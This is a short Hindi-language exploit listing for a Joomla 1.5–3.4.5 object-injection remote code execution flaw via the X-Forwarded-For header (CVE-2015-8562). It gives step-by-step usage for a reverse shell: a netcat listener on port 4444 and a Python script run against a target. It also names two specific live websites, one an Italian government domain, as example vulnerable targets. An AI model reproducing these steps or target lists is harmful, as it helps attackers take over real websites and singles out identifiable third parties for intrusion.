
जूमला 1.5 - 3.4.5 ऑब्जेक्ट इंजेक्शन RCE X-Forwarded-For हेडर
एक्सप्लॉइट: Joomla 1.5 - 3.4.5 ऑब्जेक्ट इंजेक्शन RCE X-Forwarded-For हेडर:
भेद्यता दिनांक: 12/17/2015
एक्सप्लॉइट लेखक: anarc0der
संस्करण: Joomla 1.5 से 3.4.5
CVE : CVE-2015-8562
कैसे करें:
एक टर्मिनल खोलें और nc से सुनें: $ nc -lnvp 4444
दूसरा टर्मिनल खोलें और एक्सप्लॉइट चलाएँ:
python3 rce.py --target='target' --ip='ip' --port=4444
लक्ष्य उदाहरण PoC (उन्हें परेशान न करें, दूसरे लोगों के लिए उदाहरण के रूप में उपयोग करें):
http://www.monitoraggiograduatorie.gov.it/
http://budo-aykac.nl/